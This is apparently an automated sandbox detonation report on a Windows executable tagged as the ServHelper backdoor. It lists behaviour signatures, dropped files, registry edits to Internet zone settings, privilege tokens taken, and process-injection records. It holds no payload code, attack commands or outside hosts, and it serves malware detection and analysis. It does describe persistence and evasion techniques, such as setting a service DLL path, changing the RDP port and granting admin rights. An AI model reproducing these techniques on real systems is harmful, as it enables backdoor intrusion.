Malware Analysis Report

2024-10-19 04:38

Sample ID: 210924-xj8wjahfe8
Target: 5367615a3d3f95eeab592a53716ed3bb.exe
SHA256: af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0
Tags: persistence, upx, servhelper, backdoor, discovery, exploit, trojan
Score: 10/10


Analysis Overview

Score: 10/10

SHA256: af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0

Threat Level: Known bad

The file 5367615a3d3f95eeab592a53716ed3bb.exe was found to be: Known bad.

Malicious Activity Summary

Tags: persistence, upx, servhelper, backdoor, discovery, exploit, trojan

ServHelper

Grants admin privileges

Sets DLL path for service in the registry

Blocklisted process makes network request

UPX packed file

Modifies RDP port number used by Windows

Possible privilege escalation attempt

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Runs net.exe

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2021-09-24 18:54

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2021-09-24 18:54

Reported: 2021-09-24 18:56

Platform: win10v20210408

Max time kernel: 69s

Max time network: 74s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry (tag: persistence)

UPX packed file (tag: upx)

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zheoogak.tjh.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7BA.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BC.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI76A.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_c3uacqs4.oep.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI72B.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7AA.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Runs net.exe

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: LoadsDriver

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 628 wrote to memory of 1092 | N/A | C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 628 wrote to memory of 1092 | N/A | C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 2056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1092 wrote to memory of 2056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2056 wrote to memory of 2452 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2056 wrote to memory of 2452 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1092 wrote to memory of 3604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 3604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 3976 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 3976 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 2808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 2808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 2736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 2736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 3812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 3812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
